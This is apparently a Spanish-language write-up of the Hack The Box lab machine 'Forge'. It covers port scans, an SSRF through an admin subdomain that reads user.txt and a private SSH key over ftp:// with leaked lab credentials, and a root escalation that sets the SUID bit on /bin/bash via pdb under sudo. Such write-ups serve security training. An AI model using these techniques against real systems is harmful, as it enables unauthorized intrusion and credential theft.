nmap -A -p- -oA forge 10.129.217.253 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA forge 10.129.217.253

nmap -sU -O -p- -oA forge-udp 10.129.217.253

nikto -h 10.129.217.253:80

Pasted image 20210917083135.png

Pasted image 20210917083245.png

whatweb http://10.129.217.253

echo "10.129.217.253 forge.htb admin.forge.htb" | sudo tee -a /etc/hosts

Pasted image 20210917083439.png

http://forge.htb

Pasted image 20210917084033.png

Pasted image 20210917084237.png

Encontramos el subdominio admin.forge.htb

Pasted image 20210917084253.png

Agregamos la direccion a /etc/hosts

Pasted image 20210917084719.png

http://forge.htb/upload

Pasted image 20210917084757.png

Trato de subir una imagen al rato me da este error.

Pasted image 20210917090156.png

Hacemos un get a uploads a la imagen que acabo de subir

Pasted image 20210917091909.png

Me lleva a una pagina de propaganda

Pasted image 20210917091830.png

Vemos que en esa pagina tiene credenciales user:heightofsecurity123!

Pasted image 20210917091943.png

http://ADMIN.FORGE.HTB/u?=ftp://user:heightofsecurity123!@FORGE.HTB/user.txt

Pasted image 20210917094630.png

Conseguimos el user.txt

Pasted image 20210917094649.png

http://ADMIN.FORGE.HTB/u?=ftp://user:heightofsecurity123!@FORGE.HTB/.ssh/id_rsa

Pasted image 20210917095410.png

Vamos a la pagina y copiamos la llave

![[Pasted image 20210917095431.png]]

vim id_rsa

chmod 600 id_rsa

ssh -i id_rsa user@forge.htb

Pasted image 20210917095343.png

sudo -l

vim /opt/remote-manage.py

Vemos la credencial root:secretadminpassword

Pasted image 20210917102039.png

sudo /usr/bin/python3 /opt/remote-manage.py

Vemos que dice que esta escuchando en el puerto 53632

Y en pdb hacemos lo siguiente

import os

os.system('chmod u+s /bin/bash')

En otra consola hacemos lo siguiente:

nc localhost 53632

Cuando nos pide que es lo que queremos hacer puedes poner cualquier texto yo puse test. Esto hace que pdb reaccione.

Pasted image 20210917102920.png

/bin/bash -p

Pasted image 20210917102938.png

boxes

copyright©2022 Cu3rv0x all rights reserved